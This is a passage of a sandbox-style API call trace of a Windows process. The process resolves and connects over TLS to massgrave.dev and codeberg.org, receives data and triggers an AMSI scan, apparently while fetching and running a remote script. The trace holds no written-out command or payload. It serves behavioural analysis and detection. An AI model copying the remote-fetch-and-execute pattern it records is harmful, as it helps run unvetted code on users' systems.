optlen=4) returned -1 [0149.702] closesocket (s=0x7e4) returned 0 [0149.703] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7e4 [0149.705] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7e8 [0149.709] ioctlsocket (in: s=0x7e4, cmd=-2147195266, argp=0xb156f8df88 | out: argp=0xb156f8df88) returned 0 [0149.709] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7ec [0149.710] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7f0 [0149.710] ioctlsocket (in: s=0x7ec, cmd=-2147195266, argp=0xb156f8df88 | out: argp=0xb156f8df88) returned 0 [0149.712] WSAIoctl (in: s=0x7e4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xb156f8df10, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xb156f8df10, lpOverlapped=0x0) returned -1 [0149.713] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xb156f8daf0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0149.723] WSAEventSelect (s=0x7e4, hEventObject=0x7e8, lNetworkEvents=512) returned 0 [0149.723] WSAIoctl (in: s=0x7ec, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xb156f8df10, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xb156f8df10, lpOverlapped=0x0) returned -1 [0149.723] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xb156f8daf0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0149.724] WSAEventSelect (s=0x7ec, hEventObject=0x7f0, lNetworkEvents=512) returned 0 [0149.724] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7f8 [0149.725] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x7f8, param_3=0x3) returned 0x0 [0149.738] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xb156f8dff8 | out: phkResult=0xb156f8dff8*=0x814) returned 0x0 [0149.739] RegOpenKeyExW (in: hKey=0x814, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8df38 | out: phkResult=0xb156f8df38*=0x818) returned 0x0 [0149.739] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x81c [0149.740] RegNotifyChangeKeyValue (hKey=0x818, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x81c, fAsynchronous=1) returned 0x0 [0149.741] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8df40 | out: phkResult=0xb156f8df40*=0x820) returned 0x0 [0149.741] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x824 [0149.741] RegNotifyChangeKeyValue (hKey=0x820, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x824, fAsynchronous=1) returned 0x0 [0149.742] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8df40 | out: phkResult=0xb156f8df40*=0x828) returned 0x0 [0149.742] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x82c [0149.742] RegNotifyChangeKeyValue (hKey=0x828, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x82c, fAsynchronous=1) returned 0x0 [0149.742] GetCurrentProcess () returned 0xffffffffffffffff [0149.742] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8dec8 | out: TokenHandle=0xb156f8dec8*=0x830) returned 1 [0149.747] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8cff8 | out: phkResult=0xb156f8cff8*=0x834) returned 0x0 [0149.750] RegQueryValueExW (in: hKey=0x834, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0xb156f8d038, lpData=0x0, lpcbData=0xb156f8d030*=0x0 | out: lpType=0xb156f8d038*=0x0, lpData=0x0, lpcbData=0xb156f8d030*=0x0) returned 0x2 [0149.751] RegCloseKey (hKey=0x834) returned 0x0 [0149.779] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x1e351431920 [0149.797] WinHttpSetTimeouts (hInternet=0x1e351431920, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0149.798] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xb156f8df40 | out: pProxyConfig=0xb156f8df40) returned 1 [0149.823] CoTaskMemAlloc (cb=0x20e) returned 0x1e351437040 [0149.823] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x1e351437040, nSize=0x105 | out: lpBuffer="") returned 0x0 [0149.823] CoTaskMemFree (pv=0x1e351437040) [0149.823] CoTaskMemAlloc (cb=0x20e) returned 0x1e3514310a0 [0149.823] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x1e3514310a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0149.823] CoTaskMemFree (pv=0x1e3514310a0) [0149.828] EtwEventRegister () returned 0x0 [0149.829] EtwEventSetInformation () returned 0x0 [0149.842] GetCurrentProcess () returned 0xffffffffffffffff [0149.842] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8da08 | out: TokenHandle=0xb156f8da08*=0x86c) returned 1 [0149.846] GetCurrentProcess () returned 0xffffffffffffffff [0149.846] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8da18 | out: TokenHandle=0xb156f8da18*=0x870) returned 1 [0149.868] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x874 [0149.881] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xb156f8dd50*=0x7f8, lpdwindex=0xb156f8db24 | out: lpdwindex=0xb156f8db24) returned 0x80010115 [0149.884] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xb156f8dd00*=0x7e8, lpdwindex=0xb156f8dad4 | out: lpdwindex=0xb156f8dad4) returned 0x80010115 [0149.884] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xb156f8dd00*=0x7f0, lpdwindex=0xb156f8dad4 | out: lpdwindex=0xb156f8dad4) returned 0x80010115 [0149.885] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xb156f8ddd0*=0x81c, lpdwindex=0xb156f8dba4 | out: lpdwindex=0xb156f8dba4) returned 0x80010115 [0149.885] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xb156f8ddd0*=0x824, lpdwindex=0xb156f8dba4 | out: lpdwindex=0xb156f8dba4) returned 0x80010115 [0149.886] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xb156f8ddd0*=0x82c, lpdwindex=0xb156f8dba4 | out: lpdwindex=0xb156f8dba4) returned 0x80010115 [0149.890] GetCurrentProcess () returned 0xffffffffffffffff [0149.891] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8d968 | out: TokenHandle=0xb156f8d968*=0x878) returned 1 [0149.892] GetCurrentProcess () returned 0xffffffffffffffff [0149.892] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8d978 | out: TokenHandle=0xb156f8d978*=0x87c) returned 1 [0149.918] SetEvent (hEvent=0x77c) returned 1 [0149.951] CoTaskMemAlloc (cb=0x20e) returned 0x1e3514343a0 [0149.951] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x1e3514343a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0149.952] CoTaskMemFree (pv=0x1e3514343a0) [0149.952] CoTaskMemAlloc (cb=0x20e) returned 0x1e351434180 [0149.952] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x1e351434180, nSize=0x105 | out: lpBuffer="") returned 0x0 [0149.952] CoTaskMemFree (pv=0x1e351434180) [0149.972] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x894 [0149.973] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x898 [0149.975] GetAddrInfoW (in: pNodeName="massgrave.dev", pServiceName=0x0, pHints=0xb156f8ddf8*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb156f8dd40 | out: ppResult=0xb156f8dd40*=0x1e3513d7490*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="massgrave.dev", ai_addr=0x1e351364dd0*(sa_family=2, sin_port=0x0, sin_addr="104.21.22.3"), ai_next=0x1e3513d7a90*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1e3513667b0*(sa_family=2, sin_port=0x0, sin_addr="172.67.201.171"), ai_next=0x0))) returned 0 [0150.015] FreeAddrInfoW (pAddrInfo=0x1e3513d7490*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="massgrave.dev", ai_addr=0x1e351364dd0*(sa_family=2, sin_port=0x0, sin_addr="104.21.22.3"), ai_next=0x1e3513d7a90*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1e3513667b0*(sa_family=2, sin_port=0x0, sin_addr="172.67.201.171"), ai_next=0x0))) [0150.019] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x89c [0150.019] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8a8 [0150.019] ioctlsocket (in: s=0x89c, cmd=-2147195266, argp=0xb156f8dd68 | out: argp=0xb156f8dd68) returned 0 [0150.019] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x8ac [0150.019] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8b0 [0150.020] ioctlsocket (in: s=0x8ac, cmd=-2147195266, argp=0xb156f8dd68 | out: argp=0xb156f8dd68) returned 0 [0150.020] WSAIoctl (in: s=0x89c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xb156f8dcf0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xb156f8dcf0, lpOverlapped=0x0) returned -1 [0150.020] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xb156f8d8d0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0150.020] WSAEventSelect (s=0x89c, hEventObject=0x8a8, lNetworkEvents=512) returned 0 [0150.020] WSAIoctl (in: s=0x8ac, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0xb156f8dcf0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0xb156f8dcf0, lpOverlapped=0x0) returned -1 [0150.020] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xb156f8d8d0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0150.020] WSAEventSelect (s=0x8ac, hEventObject=0x8b0, lNetworkEvents=512) returned 0 [0150.020] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0xb156f8dd58*=0x0 | out: AdapterAddresses=0x0, SizePointer=0xb156f8dd58*=0xc28) returned 0x6f [0150.024] LocalAlloc (uFlags=0x0, uBytes=0xc28) returned 0x1e3513dcf30 [0150.025] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x1e3513dcf30, SizePointer=0xb156f8dd58*=0xc28 | out: AdapterAddresses=0x1e3513dcf30*(Alignment=0x5000001c0, Length=0x1c0, IfIndex=0x5, Next=0x1e3513dd250, AdapterName="{A6A11F8B-DD77-49CE-9467-57CD206E9786}", FirstUnicastAddress=0x1e3513dd1a0, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #2", FriendlyName="Ethernet 2", PhysicalAddress=([0]=0x4c, [1]=0xac, [2]=0xa, [3]=0xb7, [4]=0xa, [5]=0xb1, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x5, ZoneIndices=([0]=0x5, [1]=0x5, [2]=0x5, [3]=0x5, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid.Value=0x6008002000000, Luid.Info.Reserved=0x6008002000000, Luid.Info.NetLuidIndex=0x6008002000000, Luid.Info.IfType=0x6008002000000, Dhcpv4Server.lpSockaddr=0x1e3513dd0f0*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x27, [7]=0xf2, [8]=0x0, [9]=0x1b, [10]=0x48, [11]=0xc9, [12]=0x81, [13]=0xd6, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x6001b48, FirstDnsSuffix=0x0), SizePointer=0xb156f8dd58*=0xc28) returned 0x0 [0150.043] LocalFree (hMem=0x1e3513dcf30) returned 0x0 [0150.049] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8dd48 | out: phkResult=0xb156f8dd48*=0x8a4) returned 0x0 [0150.049] RegQueryValueExW (in: hKey=0x8a4, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0xb156f8dd88, lpData=0x0, lpcbData=0xb156f8dd80*=0x0 | out: lpType=0xb156f8dd88*=0x0, lpData=0x0, lpcbData=0xb156f8dd80*=0x0) returned 0x2 [0150.050] RegCloseKey (hKey=0x8a4) returned 0x0 [0150.057] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8a4 [0150.070] WSAEventSelect (s=0x894, hEventObject=0x8a4, lNetworkEvents=16) returned 0 [0150.071] WSAConnect (in: s=0x894, name=0x1e33966f178*(sa_family=2, sin_port=0x1bb, sin_addr="104.21.22.3"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned -1 [0150.074] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8dc [0150.075] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8e120*=0x874, lpdwindex=0xb156f8def4 | out: lpdwindex=0xb156f8def4) returned 0x0 [0150.998] CloseHandle (hObject=0x874) returned 1 [0151.006] setsockopt (s=0x894, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0151.053] recv (in: s=0x894, buf=0x1e339697a50, len=5, flags=0 | out: buf=0x1e339697a50*) returned 5 [0151.053] recv (in: s=0x894, buf=0x1e339697a55, len=1288, flags=0 | out: buf=0x1e339697a55*) returned 1288 [0151.053] DecryptMessage (in: phContext=0x1e33967be68, pMessage=0x1e3396b2040, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3396b2040, pfQOP=0x0) returned 0x0 [0151.054] SetEvent (hEvent=0x77c) returned 1 [0153.603] CoCreateGuid (in: pguid=0xb156f8df68 | out: pguid=0xb156f8df68*(Data1=0x1fe079ab, Data2=0x5382, Data3=0x4fb7, Data4=([0]=0x95, [1]=0xd9, [2]=0x23, [3]=0x75, [4]=0xbb, [5]=0x52, [6]=0x7c, [7]=0x56))) returned 0x0 [0153.604] AmsiScanString () returned 0x80070015 [0155.722] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144d0b0 [0155.722] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e35144d0b0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0155.722] CoTaskMemFree (pv=0x1e35144d0b0) [0155.797] EtwEventActivityIdControl () returned 0x0 [0155.797] EtwEventActivityIdControl () returned 0x0 [0155.797] EtwEventActivityIdControl () returned 0x0 [0155.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0xb156f8cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x45 [0155.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0xb156f8cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x45 [0155.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d340) returned 1 [0155.914] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d420 | out: lpFileInformation=0xb156f8d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0155.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d300) returned 1 [0155.983] BCryptGetFipsAlgorithmMode (in: pfEnabled=0xb156f8d3e0 | out: pfEnabled=0xb156f8d3e0) returned 0x0 [0155.992] EtwEventActivityIdControl () returned 0x0 [0156.109] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144df90 [0156.109] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e35144df90, nSize=0x105 | out: lpBuffer="") returned 0x0 [0156.109] CoTaskMemFree (pv=0x1e35144df90) [0156.109] EtwEventActivityIdControl () returned 0x0 [0156.109] EtwEventActivityIdControl () returned 0x0 [0156.109] EtwEventActivityIdControl () returned 0x0 [0156.132] EtwEventActivityIdControl () returned 0x0 [0156.132] CoTaskMemAlloc (cb=0x20e) returned 0x1e351452170 [0156.132] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e351452170, nSize=0x105 | out: lpBuffer="") returned 0x0 [0156.133] CoTaskMemFree (pv=0x1e351452170) [0156.199] EtwEventActivityIdControl () returned 0x0 [0156.199] EtwEventActivityIdControl () returned 0x0 [0156.199] EtwEventActivityIdControl () returned 0x0 [0156.289] QueryPerformanceCounter (in: lpPerformanceCount=0xb156f8d418 | out: lpPerformanceCount=0xb156f8d418*=3493290674988) returned 1 [0156.290] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x784 [0156.290] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xb156f8cf70*=0x7f8, lpdwindex=0xb156f8cd44 | out: lpdwindex=0xb156f8cd44) returned 0x80010115 [0156.290] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xb156f8cf20*=0x7e8, lpdwindex=0xb156f8ccf4 | out: lpdwindex=0xb156f8ccf4) returned 0x80010115 [0156.291] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xb156f8cf20*=0x7f0, lpdwindex=0xb156f8ccf4 | out: lpdwindex=0xb156f8ccf4) returned 0x80010115 [0156.291] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xb156f8cff0*=0x81c, lpdwindex=0xb156f8cdc4 | out: lpdwindex=0xb156f8cdc4) returned 0x80010115 [0156.291] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xb156f8cff0*=0x824, lpdwindex=0xb156f8cdc4 | out: lpdwindex=0xb156f8cdc4) returned 0x80010115 [0156.292] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xb156f8cff0*=0x82c, lpdwindex=0xb156f8cdc4 | out: lpdwindex=0xb156f8cdc4) returned 0x80010115 [0156.293] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x898 [0156.293] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x730 [0156.293] GetAddrInfoW (in: pNodeName="codeberg.org", pServiceName=0x0, pHints=0xb156f8d018*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb156f8cf60 | out: ppResult=0xb156f8cf60*=0x1e3513d52d0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="codeberg.org", ai_addr=0x1e3513679d0*(sa_family=2, sin_port=0x0, sin_addr="217.197.91.145"), ai_next=0x0)) returned 0 [0156.298] FreeAddrInfoW (pAddrInfo=0x1e3513d52d0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="codeberg.org", ai_addr=0x1e3513679d0*(sa_family=2, sin_port=0x0, sin_addr="217.197.91.145"), ai_next=0x0)) [0156.298] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xb156f8cd30*=0x8a8, lpdwindex=0xb156f8cb04 | out: lpdwindex=0xb156f8cb04) returned 0x80010115 [0156.298] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xb156f8cd30*=0x8b0, lpdwindex=0xb156f8cb04 | out: lpdwindex=0xb156f8cb04) returned 0x80010115 [0156.299] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8b4 [0156.299] WSAEventSelect (s=0x898, hEventObject=0x8b4, lNetworkEvents=16) returned 0 [0156.299] WSAConnect (in: s=0x898, name=0x1e3394baa98*(sa_family=2, sin_port=0x1bb, sin_addr="217.197.91.145"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned -1 [0156.300] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x788 [0156.301] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8d340*=0x784, lpdwindex=0xb156f8d114 | out: lpdwindex=0xb156f8d114) returned 0x0 [0156.639] CloseHandle (hObject=0x784) returned 1 [0156.799] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0156.801] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0156.803] GetConsoleOutputCP () returned 0x1b5 [0156.805] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8cfb8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8cfb8) returned 0 [0156.806] GetConsoleOutputCP () returned 0x1b5 [0156.806] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8cf68, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8cf68) returned 0 [0156.806] GetConsoleOutputCP () returned 0x1b5 [0156.806] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8cf08, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8cf08) returned 0 [0156.807] GetConsoleOutputCP () returned 0x1b5 [0156.807] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, 